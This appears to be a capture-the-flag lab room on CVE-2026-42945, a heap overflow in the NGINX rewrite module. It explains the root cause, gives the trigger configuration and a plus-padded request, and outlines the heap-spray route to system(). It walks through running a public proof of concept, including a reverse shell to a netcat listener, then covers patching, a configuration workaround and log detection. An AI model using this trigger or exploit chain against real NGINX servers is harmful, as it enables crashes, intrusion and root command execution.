NGINX Rift is a heap buffer overflow in the ngx_http_rewrite_module of NGINX that allows an unauthenticated remote attacker to crash a worker process or, under favourable memory conditions, achieve remote code execution. The bug has been present in the codebase since 2008 and was disclosed on 13 May 2026 by depthfirst, alongside three other memory corruption issues identified during the same audit.
Key facts:
- CVSS v4 base score: 9.2 (Critical)
- Affected components: NGINX Open Source 0.6.27 through 1.30.0, NGINX Plus R32 through R36, and several downstream F5 products including NGINX App Protect, Gateway Fabric, and Ingress Controller
- Fixed versions: NGINX Open Source 1.30.1 and 1.31.0, NGINX Plus R32 P6, R36 P4, and 37.0.0 (the first release on the new Long-Term Support track introduced on 13 May 2026)
- Public PoC: Available on the DepthFirstDisclosures/Nginx-Rift repository
The vulnerability is not reachable on every NGINX install. It requires a configuration that uses the rewrite directive with an unnamed PCRE capture (such as $1 or $2), a replacement string containing a question mark, and a subsequent rewrite, if, or set directive in the same scope. This pattern is common in production deployments that perform legacy URL canonicalisation, API gateway routing, or path preservation across migrations, so the realistic exposure is considerably broader than the trigger condition might first suggest.
Three other vulnerabilities were disclosed alongside Rift in the same audit. The full set is summarised below:
| CVE | Subsystem | Severity | Impact |
|---|---|---|---|
| CVE-2026-42945 (Rift) | ngx_http_rewrite_module | 9.2 Critical | Heap overflow, RCE |
| CVE-2026-42946 | ngx_http_scgi_module, ngx_http_uwsgi_module | 8.3 High | Heap overread on crafted upstream response (AitM), worker memory disclosure or DoS |
| CVE-2026-40701 | ngx_http_ssl_module | 6.3 Medium | Use-after-free on OCSP DNS path |
| CVE-2026-42934 | ngx_http_charset_module | 6.3 Medium | Out-of-bounds read on UTF-8 boundary |
Rift is the most severe of the four because it is unauthenticated, deterministic in heap layout across worker processes, and reachable on widely deployed configurations. The same multi-process architecture that makes NGINX a reliable web server (a master process and several identical workers, each with a duplicated address space) also makes the bug forgiving to exploit. A failed attempt only crashes a worker; the master immediately respawns a fresh worker with the same memory layout, so an attacker can retry until the exploit succeeds.
Learning Objectives
By the end of this room, you will be able to:
- Describe the role of the rewrite and set directives in NGINX request processing
- Explain the two-pass design of the NGINX script engine and how a state mismatch between passes causes the heap overflow
- Identify the configuration pattern that exposes a server to CVE-2026-42945
- Walk through the heap feng shui technique used to convert the overflow into code execution
- Apply the published configuration mitigation and confirm the proof-of-concept is blocked
Prerequisites
This room assumes comfort with HTTP request structure, the basics of reverse proxying, and operation from a Linux command line. Familiarity with the Web Fundamentals module and the Linux Fundamentals module is sufficient. Prior exposure to heap memory corruption concepts is helpful but not required; the relevant heap concepts are introduced in Task 4 as they appear.
Connecting to the Machine
Click the Start Machine button at the top of this task and allow about a minute for the machine to boot. The room provides a graphical VNC session that opens in a new browser window; the desktop session is already logged in as the ubuntu user. The vulnerable NGINX target runs on port 19321, so the target is reachable from the VNC desktop at http://127.0.0.1:19321/ and from a remote attacker at http://MACHINE_IP:19321/, where MACHINE_IP is the address shown at the top of this task. The full launch state and the exploitation procedure are covered in Task 5.
I have successfully started my machine.
The two NGINX directives at the centre of CVE-2026-42945 are rewrite and set. Both are routine building blocks of production configurations, and both have well-defined, documented behaviour. In this section, we describe what they do and why they are commonly chained, before showing how the chain triggers the bug in Task 3.
The rewrite directive modifies the request URI based on a regular expression match. When the request URI matches the pattern, the directive replaces the URI with a new string. A typical configuration might rewrite all paths under /api/ to a versioned backend path. The configuration below routes any request whose URI starts with /api/ to the equivalent path under /v2/api/, preserving everything after /api/ through the unnamed capture $1.
location ~ ^/api/(.*)$ {
    rewrite ^/api/(.*)$ /v2/api/$1;
}
A request for /api/users/42 is rewritten internally to /v2/api/users/42 before NGINX hands it on for further processing. The string $1 in the replacement is an example of a regex back-reference, where $1 corresponds to the first parenthesised group in the matching pattern. NGINX supports the standard PCRE capture syntax; captures are unnamed by default, which is the form $1, $2, and so on.
A subtle behaviour matters here. If the replacement string contains a question mark, NGINX treats everything after the question mark as a new query string and discards the request's original arguments. The replacement /internal?migrated=true rewrites the path to /internal and replaces the query string with migrated=true. This is the documented way to drop or rewrite query parameters during URL canonicalisation.
The set directive assigns a value to a custom variable that NGINX maintains for the lifetime of the request. The value can be a constant, another variable, or a back-reference to the most recently evaluated regular expression. Variables defined with set are typically used to preserve information that would otherwise be lost across a rewrite, or to compose values used later in proxy headers, log formats, or further routing decisions. A common pattern saves the original captured path to a variable so that backend applications and access logs retain visibility of what the client originally requested.
location ~ ^/api/(.*)$ {
    rewrite ^/api/(.*)$ /v2/api/$1;
    set $original_endpoint $1;
}
The set directive runs after the rewrite, and the back-reference $1 still refers to the capture from the regex evaluated against the original /api/(.*)$ path. The chain therefore performs two related operations against the same capture group, in a documented and supported order.
Under the surface, NGINX does not interpret either directive at request time. Both directives are compiled at configuration load into a sequence of operations executed by an internal script engine. At runtime, the engine walks the compiled operations in a two-pass process. The first pass calculates the total length of the final output string so the script engine can allocate exactly the right amount of memory from its per-request pool. The second pass writes the actual data into that buffer. The design is performant because it avoids repeated small allocations, but it depends on the length calculation in the first pass matching the data written in the second pass exactly. The state mismatch that breaks this assumption is the subject of Task 3.
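The two-pass idea can be illustrated with a small Python model. This is a sketch only, not NGINX's C implementation: the names `literal` and `run_two_pass` are hypothetical, and each compiled operation is represented as a pair of functions, one for the length pass and one for the copy pass.

```python
from typing import Callable, List, Tuple

# Hypothetical model: one compiled operation = (length function, copy function).
Op = Tuple[Callable[[], int], Callable[[bytearray, int], int]]


def literal(text: bytes) -> Op:
    """Build an operation that emits a fixed byte string."""
    def length() -> int:
        return len(text)

    def copy(buf: bytearray, pos: int) -> int:
        buf[pos:pos + len(text)] = text
        return pos + len(text)

    return (length, copy)


def run_two_pass(ops: List[Op]) -> bytes:
    """Size the buffer in pass one, fill it in pass two."""
    # Pass 1: sum the lengths so the buffer is allocated exactly once.
    total = sum(length() for length, _ in ops)
    buf = bytearray(total)

    # Pass 2: write each operation's data at the running cursor.
    pos = 0
    for _, copy in ops:
        pos = copy(buf, pos)

    # The design is only sound if both passes agree on the size.
    if pos != total:
        raise ValueError(f"length pass said {total}, copy pass wrote {pos}")
    return bytes(buf)


print(run_two_pass([literal(b"/v2/api/"), literal(b"users/42")]))
```

Python's `bytearray` grows on demand, so a disagreement between the passes shows up here as a `ValueError` rather than as memory corruption. In C, the copy pass writes through a raw pointer and nothing performs that check.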
The root cause of CVE-2026-42945 is a single internal flag that the script engine sets in one pass and reads in the other, despite the two passes running against different engine instances. The flag is is_args, defined on struct ngx_http_script_engine_t. It indicates whether the engine is currently writing into the query-string portion of a URL, and it controls whether captured values are URI-escaped before being written.
When a rewrite replacement string contains a question mark, the compiled bytecode includes a call to ngx_http_script_start_args_code. That function sets e->is_args = 1 on the main script engine. The flag is never explicitly reset before subsequent compiled directives execute. For a configuration where rewrite is followed by set, the main engine therefore carries is_args = 1 into the evaluation of the set directive.
The set directive uses a separate path when its right-hand side references a regex capture. The relevant function is ngx_http_script_complex_value_code, which executes the length-calculation pass against a fresh, fully zeroed sub-engine, conventionally named le. The author of the original code did this so the length calculation could not be polluted by state left over from earlier operations. The actual copy pass, however, still runs on the main engine e, with is_args unchanged.
The decision to escape or not escape a captured value is made by ngx_http_script_copy_capture_len_code (used during the length pass) and ngx_http_script_copy_capture_code (used during the copy pass). Both functions check the same condition before deciding whether to call ngx_escape_uri. The condition combines the engine's is_args flag with whether the request URI contained characters that need escaping.
During the length pass, le.is_args is zero because the sub-engine was zeroed. The condition evaluates false, the function takes the simple path, and returns the unescaped capture length, which is the raw number of bytes in the captured substring. During the copy pass, e->is_args is still one because the main engine was never reset. The condition evaluates true, the function takes the URI-escaping path, and writes the escaped capture into the buffer.
For URI-safe characters that escaping leaves untouched, the two passes produce the same number of bytes and the mismatch goes unnoticed. For escapable characters, escaping replaces each character with its three-byte %xx percent-encoded form. The plus sign, for example, escapes to %2B. If the captured substring contains N escapable characters, the copy pass writes raw_size + 2 * N bytes into a buffer that was allocated for only raw_size bytes. The result is a deterministic, attacker-controlled overflow on the NGINX worker's memory pool.
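The arithmetic can be checked with a short Python model of the two passes. This is a simplified sketch: the `SAFE_BYTES` set is an assumption chosen for illustration and does not reproduce the real escape table inside ngx_escape_uri, and the function names are hypothetical. The only behaviour taken from the text is that an escapable byte occupies one byte when unescaped and three bytes when escaped.

```python
import string
from typing import Tuple

# Assumption for illustration only: letters, digits and "-._~" are URI-safe.
# The real table used by ngx_escape_uri is different and more detailed.
SAFE_BYTES = set((string.ascii_letters + string.digits + "-._~").encode())


def escapable_count(capture: bytes) -> int:
    """Count bytes that the model treats as needing %xx escaping."""
    return sum(1 for b in capture if b not in SAFE_BYTES)


def capture_len(capture: bytes, is_args: bool) -> int:
    """Bytes produced for a capture, depending on the engine's is_args flag."""
    if is_args:
        # Escaping path: each escapable byte becomes three bytes (%xx).
        return len(capture) + 2 * escapable_count(capture)
    # Simple path: raw capture length.
    return len(capture)


def simulate_mismatch(capture: bytes) -> Tuple[int, int, int]:
    """Return (bytes reserved, bytes written, overflow) for one capture."""
    reserved = capture_len(capture, is_args=False)  # zeroed sub-engine le
    written = capture_len(capture, is_args=True)    # main engine e, flag still set
    return reserved, written, written - reserved


print(simulate_mismatch(b"+" * 2000))  # (2000, 6000, 4000)
print(simulate_mismatch(b"users42"))   # (7, 7, 0)
```

A capture made only of safe bytes yields an overflow of zero, which is why the mismatch goes unnoticed for ordinary traffic.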
The trigger configuration in the published advisory is short:
location ~ ^/api/(.*)$ {
    rewrite ^/api/(.*)$ /internal?migrated=true;
    set $original_endpoint $1;
}
The rewrite replacement string contains a question mark, so is_args is set on the main engine. The set directive references the unnamed capture $1, so it routes through ngx_http_script_complex_value_code and the two-pass mismatch fires. If the client request URI for this location contains plus signs (or any other URI-escapable character) inside the captured part, those characters are counted as one byte each by the length pass and three bytes each by the copy pass.
A request that triggers a manageable overflow against the configuration above looks like the request below. The URI is constructed to land in the vulnerable location block, the captured part (.*) contains a long run of plus signs, and each plus is later escaped to %2B during the copy pass.
GET /api/+++++++++++++...+++++++++++++ HTTP/1.1
Host: localhost
For 2,000 plus signs in the capture, the length pass reserves 2,000 bytes and the copy pass writes 6,000 bytes. The 4,000-byte difference is written past the end of the allocated pool chunk, into whatever adjacent heap memory the pool allocator placed next to it. Turning that into code execution is the subject of Task 4.
One restriction worth recording at this point is that the overflow bytes pass through ngx_escape_uri, which only emits ASCII bytes that are valid in a URI. Null bytes, control characters, and any byte outside the URI-safe set cannot be written by the overflow. An attacker must therefore construct any binary payload, including pointers, through other means.
A heap overflow alone is not code execution. To turn the overflow into a useful primitive, an attacker has to overwrite something on the heap that the worker process will later use as a pointer, ideally as a function pointer. NGINX's own memory management offers a convenient target.
NGINX allocates memory through per-request memory pools, represented by the ngx_pool_t structure. Each pool tracks its current allocation cursor, a chain of large allocations, and a linked list of cleanup callbacks. The cleanup list is the relevant field. Each entry is a ngx_pool_cleanup_t containing a function pointer (handler) and an argument pointer (data). When the pool is destroyed, NGINX walks the list and calls handler(data) for each entry. If an attacker controls the cleanup list, they control the function pointer and the argument, and system() with an attacker-supplied command string is a clean choice.
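The cleanup mechanism can be modelled in a few lines of Python to show why the list is an attractive target. This is a conceptual sketch, not the layout of ngx_pool_t: the `Pool` and `Cleanup` classes are hypothetical, only the handler and data fields come from the description above, and prepending new entries is an assumption of this model.

```python
from dataclasses import dataclass
from typing import Any, Callable, Optional


@dataclass
class Cleanup:
    """Model of one cleanup entry: a callback and its argument."""
    handler: Callable[[Any], None]
    data: Any
    next: Optional["Cleanup"] = None


class Pool:
    """Model of a pool that only tracks its cleanup list."""

    def __init__(self) -> None:
        self.cleanup: Optional[Cleanup] = None

    def cleanup_add(self, handler: Callable[[Any], None], data: Any) -> None:
        # New entries are prepended, so the list is walked newest-first.
        self.cleanup = Cleanup(handler, data, self.cleanup)

    def destroy(self) -> None:
        # Walk the list and call handler(data) for each entry.
        node = self.cleanup
        while node is not None:
            node.handler(node.data)
            node = node.next
        self.cleanup = None


calls = []
pool = Pool()
pool.cleanup_add(calls.append, "close temp file")
pool.cleanup_add(calls.append, "release upstream")
pool.destroy()
print(calls)  # ['release upstream', 'close temp file']
```

The destroy path trusts whatever the `cleanup` field points at. Whoever controls that field chooses both the function and its argument.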
The cleanup pointer sits at offset 64 inside ngx_pool_t, after several earlier fields. A contiguous heap overflow from a preceding pool will therefore corrupt all of those earlier fields on the way to the cleanup pointer. If the corrupted pool is used again for any allocation, network read, or further request processing, NGINX will dereference one of those corrupted fields and the worker will crash before reaching the cleanup phase.
The exploitation primitive must therefore corrupt the cleanup pointer and then trigger the pool's destruction immediately, before any of the other corrupted fields are touched. The depthfirst writeup describes the resulting technique as a cross-request heap feng shui, where the attacker arranges the pool layout and the lifecycle ordering using a careful sequence of HTTP connections.
The published sequence proceeds in four stages. An attacker first opens a connection and sends only partial HTTP headers, which causes NGINX to allocate a request pool but not to start processing the request. A second connection is opened immediately after, causing the pool allocator to place the second connection's pool directly adjacent to the first. The attacker then completes the headers of the first connection in a way that triggers the rewrite overflow, so the overflow runs out of the first pool and into the header of the second, adjacent pool. Finally, the attacker closes the second connection, which causes NGINX to call ngx_destroy_pool on the corrupted pool. The destroy path walks the cleanup list and never touches the other corrupted fields, so the worker calls the attacker's chosen handler with the attacker's chosen argument and does not crash before reaching it.
A second restriction has to be circumvented. The bytes written by the overflow must survive URI escaping, so any value written into the cleanup pointer must consist entirely of URI-safe bytes. An attacker therefore cannot write a fully arbitrary 64-bit pointer in a single overflow. The published PoC works around this in two ways. First, the heap layout is deterministic across worker restarts because each worker inherits its parent's address space layout, so the location of any sprayed structure is predictable across attempts. Second, the attacker sprays many fake ngx_pool_cleanup_t structures using POST request bodies, which (unlike URIs or headers) are forwarded into NGINX worker memory as raw bytes without escaping. POST bodies can therefore contain real binary pointers, including null bytes.
The spray populates the worker's heap with thousands of fake cleanup structures at predictable offsets. The attacker repeatedly retries the exploit, each time using a different low-byte overwrite to redirect the cleanup pointer until it lands on one of the sprayed fake structures. The combination of deterministic layout, a respawning worker process, and many sprayed candidates means that the brute-force search converges quickly.
Two assumptions are worth highlighting. The first is that the exploit as published demonstrates code execution only when ASLR is disabled at the operating system level. With ASLR enabled, base addresses are randomised each time the master process starts, and the sprayed pointers must be discovered before they can be used. The depthfirst writeup notes that the byte-by-byte overwrite of pointers in the cleanup list can theoretically be used to leak ASLR over many attempts, but the published proof-of-concept does not implement that step.
The second is that the overflow remains a reliable denial-of-service primitive even with ASLR enabled. Any request matching the vulnerable configuration with a long enough run of escapable characters will corrupt the heap and crash a worker. A small loop of such requests will keep NGINX in a constant restart cycle and effectively take the front-door web server offline.
Step 1: Confirm the Container is Running
Open a terminal in the VNC desktop. The container should already be up from the provisioning step. Confirm its state with docker ps, filtering on the compose project label so the output is short.
sudo docker ps --filter label=com.docker.compose.project=nginx-rift
The output shows a single running container named nginx-rift-nginx-1, with port 19321/tcp mapped to 0.0.0.0:19321 on the host.
Verify the target is responsive with a benign request. A normal request to the vulnerable location block returns a 200 response with the rewritten URI.
curl -s "http://127.0.0.1:19321/api/users/42"
Step 2: Run the PoC with a Single Command
The exploit driver poc.py accepts two mutually exclusive operating modes. The first, --cmd, executes a single shell command through the system() handler and exits. The second, --shell, generates a Python reverse shell, listens for the connection on the host, and drops you into an interactive session inside the container.
Run the single-command mode first, with a payload that writes a marker file to /tmp/pwned inside the container. The time prefix records how long the brute-force loop takes to land.
time python3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned'
Successful exploitation prints crashed - system("...") executed to stdout, typically within thirty seconds to two minutes. The PoC iterates through a hardcoded list of heap-offset candidates and retries each up to ten times. The master's respawn loop hides individual failures.
Once the PoC reports success, verify the command ran inside the container by reading the marker file with docker exec.
sudo docker exec nginx-rift-nginx-1 cat /tmp/pwned
The file contents should be hello from depthfirst. Because the cleanup handler runs as root in this lab, the marker file is also owned by root.
Step 3: Run the PoC with a Reverse Shell
The --shell mode generates a Python reverse-shell command, spawns a local netcat listener on the host, and runs the exploit against the same target. The listener IP defaults to 172.17.0.1, which is the host's address on the Docker bridge that the container is attached to, so no flag overrides are required for the published setup.
python3 poc.py --shell
The driver prints the generated reverse-shell command, starts a listener on TCP port 1337, and runs the brute-force loop. On a successful trigger, the listener catches the inbound connection and you receive an interactive /bin/sh prompt running as the NGINX worker's user inside the container, which is root in this lab.
From the prompt, confirm you have root inside the container and read the flag baked into the image.
id
cat /flag.txt
The id output confirms the cleanup handler is executing as root, which is the upstream image's default. The flag at /flag.txt is in the THM{...} format and is the room's primary objective.
Take care when running commands inside the reverse shell: the worker process is still subject to the master's lifecycle, and long-running commands can be terminated when the next exploit attempt corrupts a sibling worker. Keep interactive sessions short and copy any output you need back to the listener promptly.
What is the content of flag.txt?
Two layers of defence apply to CVE-2026-42945. The first is the upstream patch, which restores propagation of is_args into the sub-engine used by ngx_http_script_complex_value_code. The second is a configuration-level workaround that side-steps the trigger pattern without waiting for a patched binary.
Patching
NGINX Open Source 1.30.1 and 1.31.0 contain the fix. NGINX Plus customers receive the fix in R32 P6 and R36 P4. F5 has separately published patched versions of NGINX App Protect WAF, NGINX App Protect DoS, NGINX Gateway Fabric, NGINX Ingress Controller, and the F5 WAF and DoS products that embed NGINX. The vendor advisory at https://my.f5.com/manage/s/article/K000160932 lists exact fixed versions per product family.
Distributions have shipped patched packages on their usual channels. Distribution-packaged NGINX should not be assumed safe based on the package name; the actual NGINX version and the active configuration both matter. On Debian-derived systems, nginx -v and apt-cache policy nginx together show the installed version and the available upgrade. On Red Hat-derived systems, nginx -v and dnf info installed nginx provide the same information.
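A version check for the open source release can be scripted along the following lines. This is a sketch under stated assumptions: the function names are hypothetical, the range is the one given in Task 1 (0.6.27 through 1.30.0), and the input is assumed to be the banner printed by nginx -v, which has the form "nginx version: nginx/1.24.0". It does not cover NGINX Plus release numbering, and a distribution may backport the fix without changing the upstream version number, so an "affected" result is a prompt to check the package changelog rather than a verdict.

```python
import re
from typing import Optional, Tuple

# Affected range for NGINX Open Source as stated in this room.
AFFECTED_MIN = (0, 6, 27)
AFFECTED_MAX = (1, 30, 0)


def parse_nginx_version(banner: str) -> Optional[Tuple[int, int, int]]:
    """Extract (major, minor, patch) from an nginx -v banner, if present."""
    match = re.search(r"nginx/(\d+)\.(\d+)\.(\d+)", banner)
    if match is None:
        return None
    return tuple(int(part) for part in match.groups())


def is_affected_open_source(banner: str) -> Optional[bool]:
    """True if the version is in the affected range, None if unparseable."""
    version = parse_nginx_version(banner)
    if version is None:
        return None
    return AFFECTED_MIN <= version <= AFFECTED_MAX


print(is_affected_open_source("nginx version: nginx/1.24.0 (Ubuntu)"))  # True
print(is_affected_open_source("nginx version: nginx/1.30.1"))           # False
```

Note that nginx -v writes its banner to standard error, so a wrapper that captures the output needs to read that stream.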
Configuration Workaround
On hosts where an immediate upgrade is not possible, the vulnerability can be neutralised by replacing every unnamed PCRE capture in an affected rewrite directive with a named capture. The bug is reachable only through the unnamed-capture code path; named captures use a different evaluation function that is not affected by the is_args state mismatch.
The trigger configuration from Task 3 is mitigated by changing the unnamed (.*) to a named capture such as (?<path>.*) and updating the set to reference $path instead of $1.
location ~ ^/api/(?<path>.*)$ {
    rewrite ^/api/(?<path>.*)$ /internal?migrated=true;
    set $original_endpoint $path;
}
The behaviour of the configuration is preserved. The trigger is removed. This workaround should be treated as a temporary measure rather than a permanent fix, as it is sensitive to future changes elsewhere in the codebase.
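Finding candidate directives across a large configuration can be partly automated. The Python sketch below is a rough line-based heuristic, not a real NGINX configuration parser, and the function name is hypothetical. It flags a rewrite whose replacement contains a question mark when a later rewrite, if, or set directive at the same brace depth references a numbered capture such as $1. It assumes one directive per line and unquoted arguments, so its output should be treated as a list of places to review by hand.

```python
import re
from typing import List

# rewrite <regex> <replacement> [flag];  (unquoted arguments assumed)
REWRITE = re.compile(r"^\s*rewrite\s+(\S+)\s+(\S+)")
# A later rewrite/if/set directive that references a numbered capture.
FOLLOWER = re.compile(r"^\s*(rewrite|if|set)\b.*\$\d")


def find_trigger_candidates(config: str) -> List[int]:
    """Return 1-based line numbers of rewrite directives worth reviewing."""
    lines = config.splitlines()
    hits = []
    for index, line in enumerate(lines):
        match = REWRITE.match(line)
        if match is None or "?" not in match.group(2):
            continue
        depth = 0  # brace depth relative to the rewrite's own block
        for later in lines[index + 1:]:
            if later.lstrip().startswith("#"):
                continue  # skip comment lines
            if depth == 0 and FOLLOWER.match(later):
                hits.append(index + 1)
                break
            depth += later.count("{") - later.count("}")
            if depth < 0:
                break  # left the block that contains the rewrite
    return hits


vulnerable = """location ~ ^/api/(.*)$ {
    rewrite ^/api/(.*)$ /internal?migrated=true;
    set $original_endpoint $1;
}
"""
print(find_trigger_candidates(vulnerable))  # [2]
```

Run against the mitigated block above, the same function returns an empty list, because `$path` is not a numbered capture.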
Detection
The same property that makes the bug exploitable also makes it visible. A successful exploit attempt produces a burst of long, plus-padded URIs to the same vulnerable location, followed by a sequence of worker restarts. Either signal on its own is suspicious; the combination is unambiguous.
NGINX access logs capture every request URI as long as logging is configured for the affected location block. A simple grep against access.log for unusually long URIs containing long runs of plus signs surfaces probe and exploit traffic. The example below extracts requests whose URI contains thirty or more consecutive + characters, which is well above any benign client behaviour.
grep -E '\+{30,}' /var/log/nginx/access.log
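Where the run length itself is useful for triage, the same check can be written in Python. This is a minimal sketch with hypothetical function names; it scans whole log lines rather than parsing the request field, so it makes no assumption about the configured log format.

```python
import re
from typing import Iterable, List, Tuple


def longest_plus_run(line: str) -> int:
    """Length of the longest run of consecutive '+' characters in a line."""
    runs = re.findall(r"\++", line)
    return max((len(run) for run in runs), default=0)


def flag_plus_runs(lines: Iterable[str], min_run: int = 30) -> List[Tuple[int, str]]:
    """Return (run length, line) for every line at or above the threshold."""
    flagged = []
    for line in lines:
        run = longest_plus_run(line)
        if run >= min_run:
            flagged.append((run, line.rstrip("\n")))
    return flagged


sample = [
    '10.0.0.5 - - "GET /api/users/42 HTTP/1.1" 200\n',
    '10.0.0.9 - - "GET /api/' + "+" * 40 + ' HTTP/1.1" 502\n',
]
for run, line in flag_plus_runs(sample):
    print(run, line[:40])
```

To scan a real log, pass an open file object, for example `flag_plus_runs(open("/var/log/nginx/access.log"))`. Sorting the result by run length puts the most aggressive probes first.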
NGINX error logs, on the other hand, record worker process restarts when the master log level is set to notice or higher. A spike in worker process N exited on signal 11 entries within a short window indicates that something is crashing workers regardless of the cause, and should be correlated with the access log timestamps. The depthfirst PoC also leaves a distinctive pattern of half-open and immediately closed connections on the affected port; an ss -t snapshot during an active attack shows many connections in the CLOSE_WAIT and LAST_ACK states.
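Counting crash entries per minute makes the spike easy to see and to line up against access log timestamps. The Python sketch below uses a hypothetical function name and assumes the default error log layout, in which each line starts with a timestamp of the form YYYY/MM/DD HH:MM:SS; a customised log pipeline may need a different pattern.

```python
import re
from collections import Counter
from typing import Iterable

# Capture the timestamp down to the minute on lines reporting a segfault.
CRASH = re.compile(
    r"^(\d{4}/\d{2}/\d{2} \d{2}:\d{2}):\d{2} .*"
    r"worker process \d+ exited on signal 11"
)


def crashes_per_minute(lines: Iterable[str]) -> Counter:
    """Count 'exited on signal 11' entries, keyed by minute."""
    counts: Counter = Counter()
    for line in lines:
        match = CRASH.match(line)
        if match:
            counts[match.group(1)] += 1
    return counts


sample = [
    "2026/05/14 10:02:11 [alert] 1#1: worker process 31 exited on signal 11\n",
    "2026/05/14 10:02:12 [alert] 1#1: worker process 32 exited on signal 11\n",
    "2026/05/14 10:03:40 [notice] 1#1: start worker process 33\n",
]
print(crashes_per_minute(sample))
```

A handful of crashes in a day may be unrelated; dozens within one minute, matching a burst of plus-padded URIs, is the pattern described above.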
Web application rules can be deployed in front of NGINX to block requests whose URI contains long runs of escapable characters, but care should be taken to avoid blocking benign clients that legitimately pass escapable characters in path components. A safer signature targets the specific combination of a URI matching a known rewrite pattern with a payload above a length threshold and a high proportion of plus signs.
NGINX Rift is a state-mismatch bug rather than a parser bug or a logic bug. The vulnerability exists because one engine instance was reset and another was not, and because a single boolean flag silently changes the meaning of a downstream length calculation. The class of bug is older than the eighteen years the vulnerability has lived in the NGINX codebase; equivalent two-pass length-then-copy patterns occur in many performance-oriented C codebases, and a search of historical CVE feeds turns up close cousins in parsers, RPC frameworks, and database query builders.
Three operational lessons stand out. The first is that configuration matters as much as version. The rewrite pattern, not the version number alone, defines the attack surface: an unpatched NGINX with no rewrite directives at all has no exposure. A version inventory alone is therefore not sufficient to triage exposure to CVE-2026-42945. Configuration review against the trigger pattern (unnamed PCRE capture, replacement string containing a question mark, subsequent rewrite, if, or set directive) is required to scope risk accurately.
The second is that worker respawn architectures are double-edged. The same property that makes NGINX a robust web server in the face of crashes is what makes the bug forgiving to exploit. Architectural choices made for availability often create useful behaviours for an attacker, and the assumption that a crash is the worst possible outcome can hide the existence of an underlying corruption primitive.
The third is that long-lived code with no recent security activity is not the same as proven code. The is_args flag in ngx_http_script.c has been in the codebase since 2008. It survived eighteen years of code review, integration testing, and production deployment, and an automated whole-repository analysis surfaced it on a six-hour scan once the right kind of analysis was pointed at it. Periodic re-audit of stable code is therefore as important as catching new bugs in fresh changes.
The vulnerability class continues to be the subject of active research. The depthfirst disclosure mentions that three further memory corruption issues were identified in the same audit (covered briefly in Task 1), and the broader pattern of state-mismatch bugs is explored further in the context of Copy Fail and the Dirty Frag kernel rooms, where a similar but kernel-side mismatch creates a different primitive on a different target.
I can now exploit CVE-2026-42945!